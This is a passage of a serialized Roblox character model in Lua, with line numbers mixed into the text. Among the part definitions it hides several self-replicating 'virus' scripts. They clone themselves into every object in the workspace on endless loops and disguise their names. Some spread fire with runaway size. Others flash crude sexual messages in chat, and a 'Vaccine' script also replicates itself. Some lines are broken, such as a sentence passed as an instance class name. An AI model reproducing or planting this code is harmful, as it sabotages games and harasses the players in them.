			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
976
				NameCheck = true
977
			end
978
		end
979
		if NameCheck == false then
980
			local cloak = c:Clone()
981
			cloak.Name = ""
982
			cloak:GetChildren()[1].Name = ""
983
			cloak.Parent = s[i]
984
		end
985
		wait(0.1)
986
	end
987
	wait(1)
988
end
989
990
end,o37)
991
end))
992
o39 = Create("Script",{
993
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
994
["Parent"] = mas,
995
})
996
table.insert(cors,coroutine.create(function()
997
wait()
998
runDummyScript(function()
999
names={"AmazingOmegaJames","H75","","","","","","",""}
1000
local NameCheck = false
1001
script.Parent.Name = names[math.random(1, #names)]
1002
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
1003
local c = script.Parent:Clone()
1004
1005
function addEvent(ch)
1006
	wait(math.random())
1007
	NameCheck = false
1008
	for ss = 1, #names do
1009
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
1010
			NameCheck = true
1011
		end
1012
	end
1013
	if NameCheck == false then
1014
		local cloak = c:Clone()
1015
		cloak.Name = ""
1016
		cloak:GetChildren()[1].Name = ""
1017
		cloak.Parent = ch
1018
		cloak.Name = names[math.random(1, 5)]
1019
	end
1020
end
1021
1022
workspace.ChildAdded:connect(addEvent)
1023
1024
game.Players.PlayerAdded:connect(function(pl)
1025
	pl.Chatted:connect(function(m)
1026
		if m:sub(1, 5) == "/sc t" then
1027
			local m = Instance.new("The creator of this place is AmazingOmegaJames")
1028
			m.Parent = workspace
1029
			m.Text = "THEY CALL ME CRAZY"
1030
			wait(1)
1031
			m.Text = "lOoOoOoOp"
1032
			wait(0.25)
1033
			m.Text = "LoOoOoOoP"
1034
			wait(0.25)
1035
			m.Text = "lOoOoOoOp"
1036
			wait(0.25)
1037
			m.Text = "LoOoOoOoP"
1038
			wait(0.25)
1039
			m.Text = "lOoOoOoOp"
1040
			wait(0.25)
1041
			m.Text = "LoOoOoOoP"
1042
			wait(0.25)
1043
			m.Text = "GOTTA GOTTA BE CRAZY SEX"
1044
			wait(1)
1045
			m.Text = "lOoOoOoOp"
1046
			wait(0.25)
1047
			m.Text = "LoOoOoOoP"
1048
			wait(0.25)
1049
			m.Text = "lOoOoOoOp"
1050
			wait(0.25)
1051
			m.Text = "LoOoOoOoP"
1052
			wait(0.25)
1053
			m.Text = "lOoOoOoOp"
1054
			wait(0.25)
1055
			m.Text = "LoOoOoOoP"
1056
			wait(0.25)
1057
			m.Text = "GOTTA HAVE SEX WITH YOU"
1058
			wait(3)
1059
			m:remove()
1060
		end
1061
		if m:sub(1, 5) == " SEX HAAXX" then
1062
			local m = Instance.new("Message")
1063
			m.Parent = workspace
1064
			m.Text = " SEX HAAXX"	
1065
			wait(3)
1066
			m:remove()
1067
		end
1068
	end)
1069
end)
1070
1071
while true do
1072
	local s = workspace:GetChildren()
1073
	for i = 1, #s do
1074
		NameCheck = false
1075
		for ss = 1, #names do
1076
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
1077
				NameCheck = true
1078
			end
1079
		end
1080
		if NameCheck == false then
1081
			local cloak = c:Clone()
1082
			cloak.Name = ""
1083
			cloak:GetChildren()[1].Name = ""
1084
			cloak.Parent = s[i]
1085
		end
1086
		wait(0.1)
1087
	end
1088
	wait(1)
1089
end
1090
1091
end,o39)
1092
end))
1093
o40 = Create("Model",{
1094
["Name"] = "Leg1",
1095
["Parent"] = o1,
1096
})
1097
o41 = Create("Part",{
1098
["Name"] = "Middle",
1099
["Parent"] = o40,
1100
["BrickColor"] = BrickColor.new("White"),
1101
["Transparency"] = 1,
1102
["Position"] = Vector3.new(60.4995079, -5251.39893, -351.075043),
1103
["Rotation"] = Vector3.new(180, -0.000157029906, -180),
1104
["Anchored"] = true,
1105
["CFrame"] = CFrame.new(60.4995079, -5251.39893, -351.075043, -1, 5.02264967e-008, -2.74068884e-006, 5.02266779e-008, 1, -6.61123138e-008, 2.74068884e-006, -6.6112456e-008, -1),
1106
["FormFactor"] = Enum.FormFactor.Symmetric,
1107
["Size"] = Vector3.new(1, 2, 1),
1108
["BottomSurface"] = Enum.SurfaceType.Smooth,
1109
["TopSurface"] = Enum.SurfaceType.Smooth,
1110
["Color"] = Color3.new(0.94902, 0.952941, 0.952941),
1111
})
1112
o42 = Create("Part",{
1113
["Parent"] = o40,
1114
["Material"] = Enum.Material.SmoothPlastic,
1115
["BrickColor"] = BrickColor.new("Cool yellow"),
1116
["Position"] = Vector3.new(60.5589447, -5252.09912, -351.117584),
1117
["Rotation"] = Vector3.new(2.65601866e-005, -90, 0),
1118
["Anchored"] = true,
1119
["CFrame"] = CFrame.new(60.5589447, -5252.09912, -351.117584, 3.44193904e-006, -5.93599509e-007, -1.00000954, -4.63562174e-007, 0.999998808, -6.79528341e-007, 0.999999166, 5.2453106e-007, 3.8545877e-006),
1120
["FormFactor"] = Enum.FormFactor.Custom,
1121
["Size"] = Vector3.new(1, 1.40000021, 0.949997187),
1122
["BottomSurface"] = Enum.SurfaceType.Smooth,
1123
["TopSurface"] = Enum.SurfaceType.Smooth,
1124
["Color"] = Color3.new(0.992157, 0.917647, 0.552941),
1125
})
1126
o43 = Create("SpecialMesh",{
1127
["Parent"] = o42,
1128
["MeshId"] = "rbxasset://fonts/leftleg.mesh",
1129
["Scale"] = Vector3.new(1.00999999, 0.230000004, 1.00999999),
1130
["MeshType"] = Enum.MeshType.FileMesh,
1131
})
1132
o44 = Create("Part",{
1133
["Parent"] = o40,
1134
["Material"] = Enum.Material.SmoothPlastic,
1135
["BrickColor"] = BrickColor.new("Daisy orange"),
1136
["Position"] = Vector3.new(60.5568657, -5251.31885, -351.12204),
1137
["Rotation"] = Vector3.new(2.65601866e-005, -90, 0),
1138
["Anchored"] = true,
1139
["CFrame"] = CFrame.new(60.5568657, -5251.31885, -351.12204, 3.44193904e-006, -5.93599509e-007, -1.00000954, -4.63562174e-007, 0.999998808, -6.79528341e-007, 0.999999166, 5.2453106e-007, 3.8545877e-006),
1140
["FormFactor"] = Enum.FormFactor.Custom,
1141
["Size"] = Vector3.new(1, 2.00000024, 0.949997187),
1142
["BottomSurface"] = Enum.SurfaceType.Smooth,
1143
["TopSurface"] = Enum.SurfaceType.Smooth,
1144
["Color"] = Color3.new(0.972549, 0.85098, 0.427451),
1145
})
1146
o45 = Create("SpecialMesh",{
1147
["Parent"] = o44,
1148
["MeshId"] = "rbxasset://fonts/leftleg.mesh",
1149
["MeshType"] = Enum.MeshType.FileMesh,
1150
})
1151
o46 = Create("Part",{
1152
["Parent"] = o40,
1153
["Material"] = Enum.Material.SmoothPlastic,
1154
["BrickColor"] = BrickColor.new("Daisy orange"),
1155
["Position"] = Vector3.new(60.5439453, -5252.08887, -350.657501),
1156
["Rotation"] = Vector3.new(3.00432184e-005, 0.000220848902, 3.89817178e-005),
1157
["Anchored"] = true,
1158
["CFrame"] = CFrame.new(60.5439453, -5252.08887, -350.657501, 1, -6.80359335e-007, 3.85454041e-006, 6.80361381e-007, 1, -5.24353084e-007, -3.85453995e-006, 5.24355698e-007, 1),
1159
["FormFactor"] = Enum.FormFactor.Custom,
1160
["Size"] = Vector3.new(1, 0.400000215, 0.200000003),
1161
["BottomSurface"] = Enum.SurfaceType.Smooth,
1162
["TopSurface"] = Enum.SurfaceType.Smooth,
1163
["Color"] = Color3.new(0.972549, 0.85098, 0.427451),
1164
})
1165
o47 = Create("SpecialMesh",{
1166
["Parent"] = o46,
1167
["MeshId"] = "rbxasset://fonts/leftleg.mesh",
1168
["Scale"] = Vector3.new(0.699999988, 0.129999995, 0.100000001),
1169
["MeshType"] = Enum.MeshType.FileMesh,
1170
})
1171
o48 = Create("Part",{
1172
["Parent"] = o40,
1173
["Material"] = Enum.Material.SmoothPlastic,
1174
["BrickColor"] = BrickColor.new("Really black"),
1175
["Position"] = Vector3.new(60.5568695, -5251.10889, -351.122009),
1176
["Rotation"] = Vector3.new(2.65601866e-005, -90, 0),
1177
["Anchored"] = true,
1178
["CFrame"] = CFrame.new(60.5568695, -5251.10889, -351.122009, 3.44193904e-006, -5.93599509e-007, -1.00000954, -4.63562174e-007, 0.999998808, -6.79528341e-007, 0.999999166, 5.2453106e-007, 3.8545877e-006),
1179
["FormFactor"] = Enum.FormFactor.Custom,
1180
["Size"] = Vector3.new(1, 1.40000021, 0.949997187),
1181
["BottomSurface"] = Enum.SurfaceType.Smooth,
1182
["TopSurface"] = Enum.SurfaceType.Smooth,
1183
["Color"] = Color3.new(0.0666667, 0.0666667, 0.0666667),
1184
})
1185
o49 = Create("SpecialMesh",{
1186
["Parent"] = o48,
1187
["MeshId"] = "rbxasset://fonts/leftleg.mesh",
1188
["Scale"] = Vector3.new(1.00999999, 0.800000012, 1.00999999),
1189
["MeshType"] = Enum.MeshType.FileMesh,
1190
})
1191
o50 = Create("Fire",{
1192
["Parent"] = o48,
1193
["Size"] = 30,
1194
["Color"] = Color3.new(1, 0.678431, 0),
1195
["Enabled"] = false,
1196
["Heat"] = 25,
1197
["SecondaryColor"] = Color3.new(1, 0, 0),
1198
})
1199
o51 = Create("Script",{
1200
["Name"] = "Spread",
1201
["Parent"] = o50,
1202
})
1203
table.insert(cors,coroutine.create(function()
1204
wait()
1205
runDummyScript(function()
1206
function Spread(part)
1207
	check = part:findFirstChild("Fire")
1208
		if check == nil then 
1209
	script.Parent:Clone().Parent = part
1210
	
1211
		elseif check ~= nil then
1212
	check.Size = check.Size + 1000000
1213
	check.Heat = check.Heat  +1000000
1214
	end
1215
end
1216
1217
1218
script.Parent.Parent.Touched:connect(Spread)
1219
1220
end,o51)
1221
end))
1222
o53 = Create("Script",{
1223
["Name"] = "Script......Or is it...",
1224
["Parent"] = mas,
1225
})
1226
table.insert(cors,coroutine.create(function()
1227
wait()
1228
runDummyScript(function()
1229
-- Thanks for using My hack.............suka XD
1230
1231
if script.Parent.className ~= "RotateP" then
1232
	local p = Instance.new("RotateP")
1233
	p.Parent = workspace
1234
	p.Name = "dåååååååååååååång.........you got owned..."
1235
	script.Parent = p
1236
end
1237
1238
function check()
1239
	local list = workspace:GetChildren()
1240
	for i = 1, #list do
1241
		if list[i]:findFirstChild("dåååååååååååååång.........you got owned...") == nil and list[i].className ~= "RotateP" then
1242
			script.Parent:Clone().Parent = list[i]
1243
		end
1244
		wait()
1245
	end
1246
end
1247
1248
while true do
1249
	check()
1250
	if workspace:findFirstChild("Hello...I åm Your New Lord Lolz") == nil then
1251
		local main = script.Parent:Clone()
1252
		main.Name = "Hello...I åm Your New Lord Lolz"
1253
		main.Parent = workspace
1254
	end
1255
	wait(3)
1256
end
1257
-- Credit goes to Nomnomnom1..........................really..........did you need to know?!
1258
-- Have a nice day. XD
1259
end,o53)
1260
end))
1261
o55 = Create("Script",{
1262
["Name"] = "Script......Or is it...",
1263
["Parent"] = mas,
1264
})
1265
table.insert(cors,coroutine.create(function()
1266
wait()
1267
runDummyScript(function()
1268
if script.Parent.className ~= "RotateP" then
1269
	local p = Instance.new("RotateP")
1270
	p.Parent = workspace
1271
	p.Name = "INfecTION"
1272
	script.Parent = p
1273
end
1274
1275
function check()
1276
	local list = workspace:GetChildren()
1277
	for i = 1, #list do
1278
		if list[i]:findFirstChild("INfecTION") == nil and list[i].className ~= "RotateP" then
1279
			script.Parent:Clone().Parent = list[i]
1280
		end
1281
		wait()
1282
	end
1283
end
1284
1285
while true do
1286
	check()
1287
	if workspace:findFirstChild("inFECtion") == nil then
1288
		local main = script.Parent:Clone()
1289
		main.Name = "inFECtion"
1290
		main.Parent = workspace
1291
	end
1292
	wait(3)
1293
end
1294
1295
end,o55)
1296
end))
1297
o57 = Create("Script",{
1298
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
1299
["Parent"] = mas,
1300
})
1301
table.insert(cors,coroutine.create(function()
1302
wait()
1303
runDummyScript(function()
1304
names={"dapperguestyo"}
1305
local NameCheck = false
1306
script.Parent.Name = names[math.random(1, #names)]
1307
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
1308
local c = script.Parent:Clone()
1309
1310
function addEvent(ch)
1311
	wait(math.random())
1312
	NameCheck = false
1313
	for ss = 1, #names do
1314
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
1315
			NameCheck = true
1316
		end
1317
	end
1318
	if NameCheck == false then
1319
		local cloak = c:Clone()
1320
		cloak.Name = ""
1321
		cloak:GetChildren()[1].Name = ""
1322
		cloak.Parent = ch
1323
		cloak.Name = names[math.random(1, 5)]
1324
	end
1325
end
1326
1327
workspace.ChildAdded:connect(addEvent)
1328
1329
game.Players.PlayerAdded:connect(function(pl)
1330
	pl.Chatted:connect(function(m)
1331
		if m:sub(1, 5) == "/sc t" then
1332
			local m = Instance.new("Message")
1333
			m.Parent = workspace
1334
			m.Text = "THEY CALL ME CRAZY"
1335
			wait(1)
1336
			m.Text = "lOoOoOoOp"
1337
			wait(0.25)
1338
			m.Text = "next page"
1339
			wait(0.25)
1340
			m.Text = "lOoOoOoOp"
1341
			wait(0.25)
1342
			m.Text = "LoOoOoOoP"
1343
			wait(0.25)
1344
			m.Text = "lOoOoOoOp"
1345
			wait(0.25)
1346
			m.Text = "LoOoOoOoP"
1347
			wait(0.25)
1348
			m.Text = "GOTTA GOTTA BE CRAZY"
1349
			wait(1)
1350
			m.Text = "lOoOoOoOp"
1351
			wait(0.25)
1352
			m.Text = "LoOoOoOoP"
1353
			wait(0.25)
1354
			m.Text = "lOoOoOoOp"
1355
			wait(0.25)
1356
			m.Text = "brendantaylor rules"
1357
			wait(0.25)
1358
			m.Text = "so does iampoobx"
1359
			wait(0.25)
1360
			m.Text = "LoOoOoOoP"
1361
			wait(0.25)
1362
			m.Text = "GOTTA GET A LIFE (YOU)"
1363
			wait(3)
1364
			m:remove()
1365
		end
1366
		if m:sub(1, 5) == "HAAXX" then
1367
			local m = Instance.new("Message")
1368
			m.Parent = workspace
1369
			m.Text = "HAAXX"	
1370
			wait(3)
1371
			m:remove()
1372
		end
1373
	end)
1374
end)
1375
1376
while true do
1377
	local s = workspace:GetChildren()
1378
	for i = 1, #s do
1379
		NameCheck = false
1380
		for ss = 1, #names do
1381
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
1382
				NameCheck = true
1383
			end
1384
		end
1385
		if NameCheck == false then
1386
			local cloak = c:Clone()
1387
			cloak.Name = ""
1388
			cloak:GetChildren()[1].Name = ""
1389
			cloak.Parent = s[i]
1390
		end
1391
		wait(0.1)
1392
	end
1393
	wait(1)
1394
end
1395
1396
end,o57)
1397
end))
1398
o58 = Create("Script",{
1399
["Name"] = "Vaccine",
1400
["Parent"] = o48,
1401
})
1402
table.insert(cors,coroutine.create(function()
1403
wait()
1404
runDummyScript(function()
1405
function spread() -- created by bumblebee773
1406
local stuff = game.Workspace:GetChildren()
1407
for i = 1, #stuff do
1408
if (stuff[i].className ~= "Script") and (stuff[i]:findFirstChild("Vaccine") == nil) and (stuff[i].className ~= "Camera") then
1409
local clone = script:clone()
1410
clone.Parent = stuff[i]
1411
end
1412
end
1413
end
1414
1415
while true do
1416
wait(.1)
1417
spread()
1418
end
1419
1420
function GetAllItems(mdl) 
1421
local objs = {} 
1422
function Search(obj) 
1423
if obj~=workspace then 
1424
table.insert(objs,obj) 
1425
end 
1426
if #obj:GetChildren() > 0 then 
1427
for i, v in ipairs(obj:GetChildren()) do 
1428
Search(v) 
1429
end 
1430
end 
1431
end 
1432
Search(mdl) 
1433
return objs 
1434
end 
1435
1436
1437
1438
for i, v in ipairs(GetAllItems(workspace)) do 
1439
if v.className == "Script" then 
1440
if v.Name == "Chaotic" or v.Name == "Spreadify" or v.Name == "Virus" or v.Name == "Infected" then 
1441
v.Parent = game.Lighting --Just in case it has a removal prevention. 
1442
t = Instance.new("ObjectValue") 
1443
t.Name = "IsAVirus" 
1444
t.Parent = v 
1445
end 
1446
end 
1447
end 
1448
1449
for i, v in ipairs(game.Lighting:GetChildren()) do 
1450
if v:findFirstChild("IsAVirus") then --Only remove the viruses. 
1451
v:remove() 
1452
end 
1453
end 
1454
1455
1456
print("Virus debugged! All clean!")
1457
end,o58)
1458
end))
1459
o60 = Create("Script",{
1460
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
1461
["Parent"] = mas,
1462
})
1463
table.insert(cors,coroutine.create(function()
1464
wait()
1465
runDummyScript(function()
1466
names={"NoNoIDon'tNeedAllOfYourAwkwårdSovietArguments", "IAmHereToHeålYourPlace", "FeelFreeToIns3rtGrammåticålErrorsHere", "ThisScriptIsAJumpStartToAHeålthyLifestyle", "FreeStyleMåyGoAnywhereIfNeeded", "3.14159265358979,ALotOfRåndomPiNumbers", "RandomåGoesHere:3", [[""''""''""å|`ç]], "77å", "å9001", "IStårtHere"}
1467
local NameCheck = false
1468
script.Parent.Name = names[math.random(1, #names)]
1469
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
1470
local c = script.Parent:Clone()
1471
1472
function addEvent(ch)
1473
	wait(math.random())
1474
	NameCheck = false
1475
	for ss = 1, #names do
1476
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
1477
			NameCheck = true
1478
		end
1479
	end
1480
	if NameCheck == false then
1481
		local cloak = c:Clone()
1482
		cloak.Name = ""
1483
		cloak:GetChildren()[1].Name = ""
1484
		cloak.Parent = ch
1485
		cloak.Name = names[math.random(1, 5)]
1486
	end
1487
end
1488
1489
workspace.ChildAdded:connect(addEvent)
1490
1491
game.Players.PlayerAdded:connect(function(pl)
1492
	pl.Chatted:connect(function(m)
1493
		if m:sub(1, 5) == "/sc t" then
1494
			local m = Instance.new("Message")
1495
			m.Parent = workspace
1496
			m.Text = "THEY CALL ME CRAZY"
1497
			wait(1)
1498
			m.Text = "lOoOoOoOp"
1499
			wait(0.25)
1500
			m.Text = "LoOoOoOoP"
1501
			wait(0.25)
1502
			m.Text = "lOoOoOoOp"
1503
			wait(0.25)
1504
			m.Text = "LoOoOoOoP"
1505
			wait(0.25)
1506
			m.Text = "lOoOoOoOp"
1507
			wait(0.25)
1508
			m.Text = "LoOoOoOoP"
1509
			wait(0.25)
1510
			m.Text = "GOTTA GOTTA BE CRAZY"
1511
			wait(1)
1512
			m.Text = "lOoOoOoOp"
1513
			wait(0.25)
1514
			m.Text = "LoOoOoOoP"
1515
			wait(0.25)
1516
			m.Text = "lOoOoOoOp"
1517
			wait(0.25)
1518
			m.Text = "LoOoOoOoP"
1519
			wait(0.25)
1520
			m.Text = "lOoOoOoOp"
1521
			wait(0.25)
1522
			m.Text = "LoOoOoOoP"
1523
			wait(0.25)
1524
			m.Text = "GOTTA GET A LIFE (YOU)"
1525
			wait(3)
1526
			m:remove()
1527
		end
1528
		if m:sub(1, 5) == "HAAXX" then
1529
			local m = Instance.new("Message")
1530
			m.Parent = workspace
1531
			m.Text = "HAAXX"	
1532
			wait(3)
1533
			m:remove()
1534
		end
1535
	end)
1536
end)
1537
1538
while true do
1539
	local s = workspace:GetChildren()
1540
	for i = 1, #s do
1541
		NameCheck = false
1542
		for ss = 1, #names do
1543
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
1544
				NameCheck = true
1545
			end
1546
		end
1547
		if NameCheck == false then
1548
			local cloak = c:Clone()
1549
			cloak.Name = ""
1550
			cloak:GetChildren()[1].Name = ""
1551
			cloak.Parent = s[i]
1552
		end
1553
		wait(0.1)
1554
	end
1555
	wait(1)
1556
end
1557
1558
end,o60)
1559
end))
1560
o62 = Create("Script",{
1561
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
1562
["Parent"] = mas,
1563
})
1564
table.insert(cors,coroutine.create(function()
1565
wait()
1566
runDummyScript(function()
1567
names={"AmazingOmegaJames","H75","","","","","","",""}
1568
local NameCheck = false
1569
script.Parent.Name = names[math.random(1, #names)]
1570
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
1571
local c = script.Parent:Clone()
1572
1573
function addEvent(ch)
1574
	wait(math.random())
1575
	NameCheck = false
1576
	for ss = 1, #names do
1577
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
1578
			NameCheck = true
1579
		end
1580
	end
1581
	if NameCheck == false then
1582
		local cloak = c:Clone()
1583
		cloak.Name = ""
1584
		cloak:GetChildren()[1].Name = ""
1585
		cloak.Parent = ch
1586
		cloak.Name = names[math.random(1, 5)]
1587
	end
1588
end
1589
1590
workspace.ChildAdded:connect(addEvent)
1591
1592
game.Players.PlayerAdded:connect(function(pl)
1593
	pl.Chatted:connect(function(m)
1594
		if m:sub(1, 5) == "/sc t" then
1595
			local m = Instance.new("The creator of this place is AmazingOmegaJames")
1596
			m.Parent = workspace
1597
			m.Text = "THEY CALL ME CRAZY"
1598
			wait(1)
1599
			m.Text = "lOoOoOoOp"
1600
			wait(0.25)
1601
			m.Text = "LoOoOoOoP"
1602
			wait(0.25)
1603
			m.Text = "lOoOoOoOp"
1604
			wait(0.25)
1605
			m.Text = "LoOoOoOoP"
1606
			wait(0.25)
1607
			m.Text = "lOoOoOoOp"
1608
			wait(0.25)
1609
			m.Text = "LoOoOoOoP"
1610
			wait(0.25)
1611
			m.Text = "GOTTA GOTTA BE CRAZY SEX"
1612
			wait(1)
1613
			m.Text = "lOoOoOoOp"
1614
			wait(0.25)
1615
			m.Text = "LoOoOoOoP"
1616
			wait(0.25)
1617
			m.Text = "lOoOoOoOp"
1618
			wait(0.25)
1619
			m.Text = "LoOoOoOoP"
1620
			wait(0.25)
1621
			m.Text = "lOoOoOoOp"
1622
			wait(0.25)
1623
			m.Text = "LoOoOoOoP"
1624
			wait(0.25)
1625
			m.Text = "GOTTA HAVE SEX WITH YOU"
1626
			wait(3)
1627
			m:remove()
1628
		end
1629
		if m:sub(1, 5) == " SEX HAAXX" then
1630
			local m = Instance.new("Message")
1631
			m.Parent = workspace
1632
			m.Text = " SEX HAAXX"	
1633
			wait(3)
1634
			m:remove()
1635
		end
1636
	end)
1637
end)
1638
1639
while true do
1640
	local s = workspace:GetChildren()
1641
	for i = 1, #s do
1642
		NameCheck = false
1643
		for ss = 1, #names do
1644
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
1645
				NameCheck = true
1646
			end
1647
		end
1648
		if NameCheck == false then
1649
			local cloak = c:Clone()
1650
			cloak.Name = ""
1651
			cloak:GetChildren()[1].Name = ""
1652
			cloak.Parent = s[i]
1653
		end
1654
		wait(0.1)
1655
	end
1656
	wait(1)
1657
end
1658
1659
end,o62)
1660
end))
1661
o63 = Create("Part",{
1662
["Parent"] = o40,
1663
["Material"] = Enum.Material.SmoothPlastic,
1664
["BrickColor"] = BrickColor.new("Cool yellow"),
1665
["Position"] = Vector3.new(60.9518738, -5250.69922, -351.127014),
1666
["Rotation"] = Vector3.new(-2.55250816e-005, 8.257218e-005, 6.11832714),
1667
["Anchored"] = true,
1668
["CFrame"] = CFrame.new(60.9518738, -5250.69922, -351.127014, 0.994303942, -0.106582128, 1.44115643e-006, 0.106582142, 0.994303882, 4.4549671e-007, -1.48042943e-006, -2.89357587e-007, 1),
1669
["FormFactor"] = Enum.FormFactor.Custom,
1670
["Size"] = Vector3.new(0.599999964, 0.600000024, 0.949997187),
1671
["BottomSurface"] = Enum.SurfaceType.Smooth,
1672
["TopSurface"] = Enum.SurfaceType.Smooth,
1673
["Color"] = Color3.new(0.992157, 0.917647, 0.552941),
1674
})
1675
o64 = Create("SpecialMesh",{
1676
["Parent"] = o63,
1677
["MeshId"] = "rbxasset://fonts/torso.mesh",
1678
["Scale"] = Vector3.new(0.150000006, 0.400000006, 1.00100005),
1679
["MeshType"] = Enum.MeshType.FileMesh,
1680
})
1681
o65 = Create("Fire",{
1682
["Parent"] = o63,
1683
["Size"] = 30,
1684
["Color"] = Color3.new(1, 0.678431, 0),
1685
["Enabled"] = false,
1686
["Heat"] = 25,
1687
["SecondaryColor"] = Color3.new(1, 0, 0),
1688
})
1689
o66 = Create("Script",{
1690
["Name"] = "Spread",
1691
["Parent"] = o65,
1692
})
1693
table.insert(cors,coroutine.create(function()
1694
wait()
1695
runDummyScript(function()
1696
function Spread(part)
1697
	check = part:findFirstChild("Fire")
1698
		if check == nil then 
1699
	script.Parent:Clone().Parent = part
1700
	
1701
		elseif check ~= nil then
1702
	check.Size = check.Size + 1000000
1703
	check.Heat = check.Heat  +1000000
1704
	end
1705
end
1706
1707
1708
script.Parent.Parent.Touched:connect(Spread)
1709
1710
end,o66)
1711
end))
1712
o68 = Create("Script",{
1713
["Name"] = "Script......Or is it...",
1714
["Parent"] = mas,
1715
})
1716
table.insert(cors,coroutine.create(function()
1717
wait()
1718
runDummyScript(function()
1719
-- Thanks for using My hack.............suka XD
1720
1721
if script.Parent.className ~= "RotateP" then
1722
	local p = Instance.new("RotateP")
1723
	p.Parent = workspace
1724
	p.Name = "dåååååååååååååång.........you got owned..."
1725
	script.Parent = p
1726
end
1727
1728
function check()
1729
	local list = workspace:GetChildren()
1730
	for i = 1, #list do
1731
		if list[i]:findFirstChild("dåååååååååååååång.........you got owned...") == nil and list[i].className ~= "RotateP" then
1732
			script.Parent:Clone().Parent = list[i]
1733
		end
1734
		wait()
1735
	end
1736
end
1737
1738
while true do
1739
	check()
1740
	if workspace:findFirstChild("Hello...I åm Your New Lord Lolz") == nil then
1741
		local main = script.Parent:Clone()
1742
		main.Name = "Hello...I åm Your New Lord Lolz"
1743
		main.Parent = workspace
1744
	end
1745
	wait(3)
1746
end
1747
-- Credit goes to Nomnomnom1..........................really..........did you need to know?!
1748
-- Have a nice day. XD
1749
end,o68)
1750
end))
1751
o70 = Create("Script",{
1752
["Name"] = "Script......Or is it...",
1753
["Parent"] = mas,
1754
})
1755
table.insert(cors,coroutine.create(function()
1756
wait()
1757
runDummyScript(function()
1758
if script.Parent.className ~= "RotateP" then
1759
	local p = Instance.new("RotateP")
1760
	p.Parent = workspace
1761
	p.Name = "INfecTION"
1762
	script.Parent = p
1763
end
1764
1765
function check()
1766
	local list = workspace:GetChildren()
1767
	for i = 1, #list do
1768
		if list[i]:findFirstChild("INfecTION") == nil and list[i].className ~= "RotateP" then
1769
			script.Parent:Clone().Parent = list[i]
1770
		end
1771
		wait()
1772
	end
1773
end
1774
1775
while true do
1776
	check()
1777
	if workspace:findFirstChild("inFECtion") == nil then
1778
		local main = script.Parent:Clone()
1779
		main.Name = "inFECtion"
1780
		main.Parent = workspace
1781
	end
1782
	wait(3)
1783
end
1784
1785
end,o70)
1786
end))
1787
o72 = Create("Script",{
1788
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
1789
["Parent"] = mas,
1790
})
1791
table.insert(cors,coroutine.create(function()
1792
wait()
1793
runDummyScript(function()
1794
names={"dapperguestyo"}
1795
local NameCheck = false
1796
script.Parent.Name = names[math.random(1, #names)]
1797
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
1798
local c = script.Parent:Clone()
1799
1800
function addEvent(ch)
1801
	wait(math.random())
1802
	NameCheck = false
1803
	for ss = 1, #names do
1804
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
1805
			NameCheck = true
1806
		end
1807
	end
1808
	if NameCheck == false then
1809
		local cloak = c:Clone()
1810
		cloak.Name = ""
1811
		cloak:GetChildren()[1].Name = ""
1812
		cloak.Parent = ch
1813
		cloak.Name = names[math.random(1, 5)]
1814
	end
1815
end
1816
1817
workspace.ChildAdded:connect(addEvent)
1818
1819
game.Players.PlayerAdded:connect(function(pl)
1820
	pl.Chatted:connect(function(m)
1821
		if m:sub(1, 5) == "/sc t" then
1822
			local m = Instance.new("Message")
1823
			m.Parent = workspace
1824
			m.Text = "THEY CALL ME CRAZY"
1825
			wait(1)
1826
			m.Text = "lOoOoOoOp"
1827
			wait(0.25)
1828
			m.Text = "next page"
1829
			wait(0.25)
1830
			m.Text = "lOoOoOoOp"
1831
			wait(0.25)
1832
			m.Text = "LoOoOoOoP"
1833
			wait(0.25)
1834
			m.Text = "lOoOoOoOp"
1835
			wait(0.25)
1836
			m.Text = "LoOoOoOoP"
1837
			wait(0.25)
1838
			m.Text = "GOTTA GOTTA BE CRAZY"
1839
			wait(1)
1840
			m.Text = "lOoOoOoOp"
1841
			wait(0.25)
1842
			m.Text = "LoOoOoOoP"
1843
			wait(0.25)
1844
			m.Text = "lOoOoOoOp"
1845
			wait(0.25)
1846
			m.Text = "brendantaylor rules"
1847
			wait(0.25)
1848
			m.Text = "so does iampoobx"
1849
			wait(0.25)
1850
			m.Text = "LoOoOoOoP"
1851
			wait(0.25)
1852
			m.Text = "GOTTA GET A LIFE (YOU)"
1853
			wait(3)
1854
			m:remove()
1855
		end
1856
		if m:sub(1, 5) == "HAAXX" then
1857
			local m = Instance.new("Message")
1858
			m.Parent = workspace
1859
			m.Text = "HAAXX"	
1860
			wait(3)
1861
			m:remove()
1862
		end
1863
	end)
1864
end)
1865
1866
while true do
1867
	local s = workspace:GetChildren()
1868
	for i = 1, #s do
1869
		NameCheck = false
1870
		for ss = 1, #names do
1871
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
1872
				NameCheck = true
1873
			end
1874
		end
1875
		if NameCheck == false then
1876
			local cloak = c:Clone()
1877
			cloak.Name = ""
1878
			cloak:GetChildren()[1].Name = ""
1879
			cloak.Parent = s[i]
1880
		end
1881
		wait(0.1)
1882
	end
1883
	wait(1)
1884
end
1885
1886
end,o72)
1887
end))
1888
o73 = Create("Script",{
1889
["Name"] = "Vaccine",
1890
